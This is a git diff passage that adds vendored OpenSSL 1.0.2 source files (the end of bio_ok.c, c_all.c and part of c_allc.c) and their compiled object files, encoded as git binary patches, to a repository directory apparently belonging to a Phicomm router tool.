+    EVP_MD *md;
+    const EVP_MD **ppmd;
+    long ret = 1;
+    int i;
+
+    ctx = b->ptr;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+        ctx->buf_len = 0;
+        ctx->buf_off = 0;
+        ctx->buf_len_save = 0;
+        ctx->buf_off_save = 0;
+        ctx->cont = 1;
+        ctx->finished = 0;
+        ctx->blockout = 0;
+        ctx->sigio = 1;
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_EOF:         /* More to read */
+        if (ctx->cont <= 0)
+            ret = 1;
+        else
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_PENDING:     /* More to read in buffer */
+    case BIO_CTRL_WPENDING:    /* More to read in buffer */
+        ret = ctx->blockout ? ctx->buf_len - ctx->buf_off : 0;
+        if (ret <= 0)
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_FLUSH:
+        /* do a final write */
+        if (ctx->blockout == 0)
+            if (!block_out(b))
+                return 0;
+
+        while (ctx->blockout) {
+            i = ok_write(b, NULL, 0);
+            if (i < 0) {
+                ret = i;
+                break;
+            }
+        }
+
+        ctx->finished = 1;
+        ctx->buf_off = ctx->buf_len = 0;
+        ctx->cont = (int)ret;
+
+        /* Finally flush the underlying BIO */
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_C_DO_STATE_MACHINE:
+        BIO_clear_retry_flags(b);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        BIO_copy_next_retry(b);
+        break;
+    case BIO_CTRL_INFO:
+        ret = (long)ctx->cont;
+        break;
+    case BIO_C_SET_MD:
+        md = ptr;
+        if (!EVP_DigestInit_ex(&ctx->md, md, NULL))
+            return 0;
+        b->init = 1;
+        break;
+    case BIO_C_GET_MD:
+        if (b->init) {
+            ppmd = ptr;
+            *ppmd = ctx->md.digest;
+        } else
+            ret = 0;
+        break;
+    default:
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    }
+    return (ret);
+}
+
+static long ok_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
+{
+    long ret = 1;
+
+    if (b->next_bio == NULL)
+        return (0);
+    switch (cmd) {
+    default:
+        ret = BIO_callback_ctrl(b->next_bio, cmd, fp);
+        break;
+    }
+    return (ret);
+}
+
+static void longswap(void *_ptr, size_t len)
+{
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+
+    if (is_endian.little) {
+        size_t i;
+        unsigned char *p = _ptr, c;
+
+        for (i = 0; i < len; i += 4) {
+            c = p[0], p[0] = p[3], p[3] = c;
+            c = p[1], p[1] = p[2], p[2] = c;
+        }
+    }
+}
+
+static int sig_out(BIO *b)
+{
+    BIO_OK_CTX *ctx;
+    EVP_MD_CTX *md;
+
+    ctx = b->ptr;
+    md = &ctx->md;
+
+    if (ctx->buf_len + 2 * md->digest->md_size > OK_BLOCK_SIZE)
+        return 1;
+
+    if (!EVP_DigestInit_ex(md, md->digest, NULL))
+        goto berr;
+    /*
+     * FIXME: there's absolutely no guarantee this makes any sense at all,
+     * particularly now EVP_MD_CTX has been restructured.
+     */
+    RAND_pseudo_bytes(md->md_data, md->digest->md_size);
+    memcpy(&(ctx->buf[ctx->buf_len]), md->md_data, md->digest->md_size);
+    longswap(&(ctx->buf[ctx->buf_len]), md->digest->md_size);
+    ctx->buf_len += md->digest->md_size;
+
+    if (!EVP_DigestUpdate(md, WELLKNOWN, strlen(WELLKNOWN)))
+        goto berr;
+    if (!EVP_DigestFinal_ex(md, &(ctx->buf[ctx->buf_len]), NULL))
+        goto berr;
+    ctx->buf_len += md->digest->md_size;
+    ctx->blockout = 1;
+    ctx->sigio = 0;
+    return 1;
+ berr:
+    BIO_clear_retry_flags(b);
+    return 0;
+}
+
+static int sig_in(BIO *b)
+{
+    BIO_OK_CTX *ctx;
+    EVP_MD_CTX *md;
+    unsigned char tmp[EVP_MAX_MD_SIZE];
+    int ret = 0;
+
+    ctx = b->ptr;
+    md = &ctx->md;
+
+    if ((int)(ctx->buf_len - ctx->buf_off) < 2 * md->digest->md_size)
+        return 1;
+
+    if (!EVP_DigestInit_ex(md, md->digest, NULL))
+        goto berr;
+    memcpy(md->md_data, &(ctx->buf[ctx->buf_off]), md->digest->md_size);
+    longswap(md->md_data, md->digest->md_size);
+    ctx->buf_off += md->digest->md_size;
+
+    if (!EVP_DigestUpdate(md, WELLKNOWN, strlen(WELLKNOWN)))
+        goto berr;
+    if (!EVP_DigestFinal_ex(md, tmp, NULL))
+        goto berr;
+    ret = memcmp(&(ctx->buf[ctx->buf_off]), tmp, md->digest->md_size) == 0;
+    ctx->buf_off += md->digest->md_size;
+    if (ret == 1) {
+        ctx->sigio = 0;
+        if (ctx->buf_len != ctx->buf_off) {
+            memmove(ctx->buf, &(ctx->buf[ctx->buf_off]),
+                    ctx->buf_len - ctx->buf_off);
+        }
+        ctx->buf_len -= ctx->buf_off;
+        ctx->buf_off = 0;
+    } else {
+        ctx->cont = 0;
+    }
+    return 1;
+ berr:
+    BIO_clear_retry_flags(b);
+    return 0;
+}
+
+static int block_out(BIO *b)
+{
+    BIO_OK_CTX *ctx;
+    EVP_MD_CTX *md;
+    unsigned long tl;
+
+    ctx = b->ptr;
+    md = &ctx->md;
+
+    tl = ctx->buf_len - OK_BLOCK_BLOCK;
+    ctx->buf[0] = (unsigned char)(tl >> 24);
+    ctx->buf[1] = (unsigned char)(tl >> 16);
+    ctx->buf[2] = (unsigned char)(tl >> 8);
+    ctx->buf[3] = (unsigned char)(tl);
+    if (!EVP_DigestUpdate(md,
+                          (unsigned char *)&(ctx->buf[OK_BLOCK_BLOCK]), tl))
+        goto berr;
+    if (!EVP_DigestFinal_ex(md, &(ctx->buf[ctx->buf_len]), NULL))
+        goto berr;
+    ctx->buf_len += md->digest->md_size;
+    ctx->blockout = 1;
+    return 1;
+ berr:
+    BIO_clear_retry_flags(b);
+    return 0;
+}
+
+static int block_in(BIO *b)
+{
+    BIO_OK_CTX *ctx;
+    EVP_MD_CTX *md;
+    unsigned long tl = 0;
+    unsigned char tmp[EVP_MAX_MD_SIZE];
+
+    ctx = b->ptr;
+    md = &ctx->md;
+
+    assert(sizeof(tl) >= OK_BLOCK_BLOCK); /* always true */
+    tl = ctx->buf[0];
+    tl <<= 8;
+    tl |= ctx->buf[1];
+    tl <<= 8;
+    tl |= ctx->buf[2];
+    tl <<= 8;
+    tl |= ctx->buf[3];
+
+    if (ctx->buf_len < tl + OK_BLOCK_BLOCK + md->digest->md_size)
+        return 1;
+
+    if (!EVP_DigestUpdate(md,
+                          (unsigned char *)&(ctx->buf[OK_BLOCK_BLOCK]), tl))
+        goto berr;
+    if (!EVP_DigestFinal_ex(md, tmp, NULL))
+        goto berr;
+    if (memcmp(&(ctx->buf[tl + OK_BLOCK_BLOCK]), tmp, md->digest->md_size) ==
+        0) {
+        /* there might be parts from next block lurking around ! */
+        ctx->buf_off_save = tl + OK_BLOCK_BLOCK + md->digest->md_size;
+        ctx->buf_len_save = ctx->buf_len;
+        ctx->buf_off = OK_BLOCK_BLOCK;
+        ctx->buf_len = tl + OK_BLOCK_BLOCK;
+        ctx->blockout = 1;
+    } else {
+        ctx->cont = 0;
+    }
+    return 1;
+ berr:
+    BIO_clear_retry_flags(b);
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_ok.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_ok.o
new file mode 100644
index 0000000000000000000000000000000000000000..9a7ee88189c1077e9c54be5e366bf50b9eb7f746
GIT binary patch
literal 7664
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_all.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_all.c
new file mode 100644
index 0000000..a3ed00d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_all.c
@@ -0,0 +1,90 @@
+/* crypto/evp/c_all.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+#if 0
+# undef OpenSSL_add_all_algorithms
+
+void OpenSSL_add_all_algorithms(void)
+{
+    OPENSSL_add_all_algorithms_noconf();
+}
+#endif
+
+void OPENSSL_add_all_algorithms_noconf(void)
+{
+    /*
+     * For the moment OPENSSL_cpuid_setup does something
+     * only on IA-32, but we reserve the option for all
+     * platforms...
+     */
+    OPENSSL_cpuid_setup();
+    OpenSSL_add_all_ciphers();
+    OpenSSL_add_all_digests();
+#ifndef OPENSSL_NO_ENGINE
+# if defined(__OpenBSD__) || defined(__FreeBSD__) || defined(HAVE_CRYPTODEV)
+    ENGINE_setup_bsd_cryptodev();
+# endif
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_all.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_all.o
new file mode 100644
index 0000000000000000000000000000000000000000..c738588696b6805d188cc9adc99327f824cb4b86
GIT binary patch
literal 1720
zcmbu9PiqrF6u{p$)kaNg6a}FodlE%EBr1qKNYau-G&I397eSWI?luW#|FAm?sR!-F
zyC1=$AH$E}$IzSNO@#X1WG3BAHWz*H_PzPdym>QkX7+uf-CQ#aP-4JSIBO{iFfE+<
zHR0A^6H4&w@~z+9Zv@2W)pya?+TY(b@AL<0z*F-Hd&nv~)yJu5R^L6Su*##mGYsoE
zzKnVfwRO;kHGnU~RJv>ElNfJbf-x-{+og@-M_eHBo1zEcI@!in`NdXIl4V1CT8E#f
z%RQ7UZ^y*dDi)&(V%3X`S_L@23<cj<!SmN!5Y<==xq!{9nRSXiBfE!6_0y$}AdmM~
zaDN2{$Fe6A=0K<0IOz4-mhHMkP={eW<|99`g3t+rBd}WS&R)H3b(+my<Ip;+@3kA&
zJkE*Iv1=tBPb26=UXY#38Al^8PL{Yk9(oB+Xm6^rbT=-c{yCiq`6R?ksES`9h(df5
zRdEx261-<ZMT0&pIrh0dK+EHq9VsvNCN|^Vlml~ZZUY-62{0%0eJ?;3gxq6zcXtwQ
zJ8xur7^EzU!^n&IF)%TMH?odm+xO-v|Hm;gm~O4Ai<+w@9d$nx*KhbXc2I3<YJjw#
zsW2$dW(F>zrC4=SZ%BSya{YzS{mK(P|9u=pbN*|56=P}63TjqVetH*KQTdhK#ZKjC
z$DL#w8DAg!9Q){1%W};}o=DG}lbNIHr|<wBnp2PeBnRmG(&Jy_xV-cGAtzMlMCV7b
xDqiut+?4t&eNeh`!}PxB-=oJ9)6WhOm@@wdYGg#OAHC1K_@ac9Of0#2{9n|<lOO;9

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_allc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_allc.c
new file mode 100644
index 0000000..280e584
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_allc.c
@@ -0,0 +1,241 @@
+/* crypto/evp/c_allc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/pkcs12.h>
+#include <openssl/objects.h>
+
+void OpenSSL_add_all_ciphers(void)
+{
+
+#ifndef OPENSSL_NO_DES
+    EVP_add_cipher(EVP_des_cfb());
+    EVP_add_cipher(EVP_des_cfb1());
+    EVP_add_cipher(EVP_des_cfb8());
+    EVP_add_cipher(EVP_des_ede_cfb());
+    EVP_add_cipher(EVP_des_ede3_cfb());
+    EVP_add_cipher(EVP_des_ede3_cfb1());
+    EVP_add_cipher(EVP_des_ede3_cfb8());
+
+    EVP_add_cipher(EVP_des_ofb());
+    EVP_add_cipher(EVP_des_ede_ofb());
+    EVP_add_cipher(EVP_des_ede3_ofb());
+
+    EVP_add_cipher(EVP_desx_cbc());
+    EVP_add_cipher_alias(SN_desx_cbc, "DESX");
+    EVP_add_cipher_alias(SN_desx_cbc, "desx");
+
+    EVP_add_cipher(EVP_des_cbc());
+    EVP_add_cipher_alias(SN_des_cbc, "DES");
+    EVP_add_cipher_alias(SN_des_cbc, "des");
+    EVP_add_cipher(EVP_des_ede_cbc());
+    EVP_add_cipher(EVP_des_ede3_cbc());
+    EVP_add_cipher_alias(SN_des_ede3_cbc, "DES3");
+    EVP_add_cipher_alias(SN_des_ede3_cbc, "des3");
+
+    EVP_add_cipher(EVP_des_ecb());
+    EVP_add_cipher(EVP_des_ede());
+    EVP_add_cipher(EVP_des_ede3());
+    EVP_add_cipher(EVP_des_ede3_wrap());
+#endif
+
+#ifndef OPENSSL_NO_RC4
+    EVP_add_cipher(EVP_rc4());
+    EVP_add_cipher(EVP_rc4_40());
+# ifndef OPENSSL_NO_MD5
+    EVP_add_cipher(EVP_rc4_hmac_md5());
+# endif
+#endif
+
+#ifndef OPENSSL_NO_IDEA
+    EVP_add_cipher(EVP_idea_ecb());
+    EVP_add_cipher(EVP_idea_cfb());
+    EVP_add_cipher(EVP_idea_ofb());
+    EVP_add_cipher(EVP_idea_cbc());
+    EVP_add_cipher_alias(SN_idea_cbc, "IDEA");
+    EVP_add_cipher_alias(SN_idea_cbc, "idea");
+#endif
+
+#ifndef OPENSSL_NO_SEED
+    EVP_add_cipher(EVP_seed_ecb());
+    EVP_add_cipher(EVP_seed_cfb());
+    EVP_add_cipher(EVP_seed_ofb());
+    EVP_add_cipher(EVP_seed_cbc());
+    EVP_add_cipher_alias(SN_seed_cbc, "SEED");
+    EVP_add_cipher_alias(SN_seed_cbc, "seed");
+#endif
+
+#ifndef OPENSSL_NO_RC2
+    EVP_add_cipher(EVP_rc2_ecb());
+    EVP_add_cipher(EVP_rc2_cfb());
+    EVP_add_cipher(EVP_rc2_ofb());
+    EVP_add_cipher(EVP_rc2_cbc());
+    EVP_add_cipher(EVP_rc2_40_cbc());
+    EVP_add_cipher(EVP_rc2_64_cbc());
+    EVP_add_cipher_alias(SN_rc2_cbc, "RC2");
+    EVP_add_cipher_alias(SN_rc2_cbc, "rc2");
+#endif
+
+#ifndef OPENSSL_NO_BF
+    EVP_add_cipher(EVP_bf_ecb());
+    EVP_add_cipher(EVP_bf_cfb());
+    EVP_add_cipher(EVP_bf_ofb());
+    EVP_add_cipher(EVP_bf_cbc());
+    EVP_add_cipher_alias(SN_bf_cbc, "BF");
+    EVP_add_cipher_alias(SN_bf_cbc, "bf");
+    EVP_add_cipher_alias(SN_bf_cbc, "blowfish");
+#endif
+
+#ifndef OPENSSL_NO_CAST
+    EVP_add_cipher(EVP_cast5_ecb());
+    EVP_add_cipher(EVP_cast5_cfb());
+    EVP_add_cipher(EVP_cast5_ofb());
+    EVP_add_cipher(EVP_cast5_cbc());
+    EVP_add_cipher_alias(SN_cast5_cbc, "CAST");
+    EVP_add_cipher_alias(SN_cast5_cbc, "cast");
+    EVP_add_cipher_alias(SN_cast5_cbc, "CAST-cbc");
+    EVP_add_cipher_alias(SN_cast5_cbc, "cast-cbc");
+#endif
+
+#ifndef OPENSSL_NO_RC5
+    EVP_add_cipher(EVP_rc5_32_12_16_ecb());
+    EVP_add_cipher(EVP_rc5_32_12_16_cfb());
+    EVP_add_cipher(EVP_rc5_32_12_16_ofb());
+    EVP_add_cipher(EVP_rc5_32_12_16_cbc());
+    EVP_add_cipher_alias(SN_rc5_cbc, "rc5");
+    EVP_add_cipher_alias(SN_rc5_cbc, "RC5");
+#endif
+
+#ifndef OPENSSL_NO_AES
+    EVP_add_cipher(EVP_aes_128_ecb());
